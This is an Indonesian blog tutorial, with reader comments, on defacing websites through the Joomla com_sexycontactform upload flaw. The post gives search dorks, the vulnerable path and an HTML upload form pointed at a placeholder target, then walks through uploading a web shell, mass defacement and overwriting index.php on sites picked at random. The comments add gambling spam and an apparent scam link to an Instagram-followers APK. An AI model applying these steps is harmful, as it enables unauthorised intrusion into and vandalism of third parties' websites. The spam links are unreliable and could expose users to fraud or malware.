Assalamualaikum sobat..
Udah pada tau belum deface website teknik com_sexy?
Bagi yang newbie, nih _MisterNotFound_ ajarin :3
Tuk mastah , nyimak aje ye :v
- BAHAN :
-
Dork :
UMUM > inurl:/com_sexycontactform/
MY FAVORITE DORK > inurl:/components/com_sexycontactform/
-
Exploit :
/components/com_sexycontactform/fileupload/index.php
-
CSRF
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
-
Script Deface sampeyan ;)
-
Masukkan dork ke search engine google.
-
Pilih target. Nah, kalo ini merupakan target
saya.
-
Masukkan exploitnya dibelakang url target. Jika vuln, maka akan tampil notice error.
NOTE : Jika ada path di url
target, maka sampeyan harus masukkan exploitnya dibelakang path nya
-
Kemudian seret Script Upload Button ke browser
yang sedang anda gunakan.
- Upload file Shell sampeyan.
- Jika website vuln terhadap Shell, maka penampakannya seperti gambar dibawah ini.
- Check Your Shell. Caranya, masukkan ‘exploit check’ ini :
components/com_sexycontactform/fileupload/files/Your Shell.php
NOTE : Cek dulu, ada path nya gak
;)
-
Dan penampakan Shell yang sudah tertanam,
seperti gambar dibawah ini
-
Lalu terserah sampeyan mau diapakan tuh website.
Mau mass deface ya silahkan, mau nitip nick silahkan. Nah kalo mau tebas index
juga silahkan ;)
-
Cara Tebas index, seperti gambar dibawah ini
NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
NOTE : Sebaiknya back-up dulu
script index aslinya ;)
-
Jika sudah selesai, tinggal klik SAVE
-
Penampakan setelah diperawani :)
upload button nya mana gan??
BalasHapusTutorialnya bagus , master. Thanks
BalasHapusminta UPLOAD BUTTONNYA mas..
BalasHapusmastah gimana mau copy dork nya kalo di disable :(
BalasHapusnjer , Liat tutor di youtube aja pake ada iklan Ad.fly segala :3 , Males gw balik lagi kesini . Cape ngetik gw Ngetik Dork + CSRF
BalasHapusberkah sekali bang.. wkwkwk
BalasHapuscuma mampir
pokerace77
BalasHapushoyapoker
wongpoker
onebetqq
bungaqq
dinastipoker
assalamualaikum maaf kalau mengganggu. kami para hackivist indonesia baru membuat apk yg bekerja sama dgn pihak instagram. ini apk untuk memperoleh real followers aktif dengan pilihan 100 sampai 500 followers. proses selama 1x24 jam. kenapa lama bro prosesnya? iya ini foll aktif jd wajar jd menunggu semua penggunanya baru kalian saling dihubungkan. kenapa harus apk ini? emg mau kalau kalian pake apk lain terus dpt foll yg fake nggakjelas, pasti kalian gakmau! resiko pake apk ini ada gk? ya jelas ada, ini kan foll aktif jd ya bisa aja kalian di unfollow. sekian dr kami, selebihnya terserah kalian, kami cuma share. get foll ini terbagi 2, ada yg langsung di web (gak payah download apk) dan ada juga apk yg bisa disimpan di hp. link ada dibawah
BalasHapuslink web: https://panelfollowersaktif2017.000webhostapp.com
link dwnload apk: https://www.dropbox.com/pri/get/Instagram_Followers_Panel_5767104.apk?_subject_uid=707375016&w=AAAXdCoJ5f1rB1FEo_deTpmaKNxX7yBt8GkUuC6Ipqj-3g
fuck off !!! :D
BalasHapus
BalasHapushttp://www.punctweb.com Blog situs bandar togel Online Indonesia